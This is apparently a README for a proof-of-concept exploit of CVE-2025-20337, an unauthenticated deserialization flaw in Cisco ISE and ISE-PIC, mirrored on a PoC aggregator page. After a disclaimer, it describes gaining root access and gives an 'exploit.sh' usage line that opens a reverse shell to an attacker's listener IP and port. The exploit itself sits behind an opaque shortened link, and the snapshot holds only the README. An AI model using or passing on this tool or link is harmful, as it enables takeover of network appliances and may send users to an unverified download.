CVE-2025-20337 PoC — Cisco ISE和Cisco ISE-PIC 注入漏洞

Source

Associated Vulnerability

Readme

# CVE-2025-20337

## DISCLAIMER
> This tool is provided for **educational and authorized security testing purposes only**. The author is not responsible for any misuse of this tool. Unauthorized testing of systems without explicit permission is illegal and strictly prohibited. By using this tool, you agree to use it only on systems for which you have obtained prior written permission. Any actions and or activities related to the material contained within this repository are solely your responsibility.

## Description:

The attacker can compromise any unpatched Cisco ISE or ISE-PIC device by sending a malicious API request over the network.
No authentication or user interaction is required. By exploiting a deserialization flaw in the monitoring API, attackers gain root access to the underlying operating system. This vulnerability turns network security appliances into attack launchpads, enabling total infrastructure takeover.

### Usage

```bash
./exploit.sh -t 10.0.55.10 -l 192.168.1.100 -p 4444

# Options:
#   -t  Target IP address
#   -l  Listener IP for reverse shell
#   -p  Listener port
#   -c  Custom command (optional)
```

Exploit:
[**href**](https://tinyurl.com/2cj5v6ze)

File Snapshot

 [4.0K]  /data/pocs/47a8415f7af5f29f65515b74a566934a95c87bae
└── [1.2K]  README.md

0 directories, 1 file

Remarks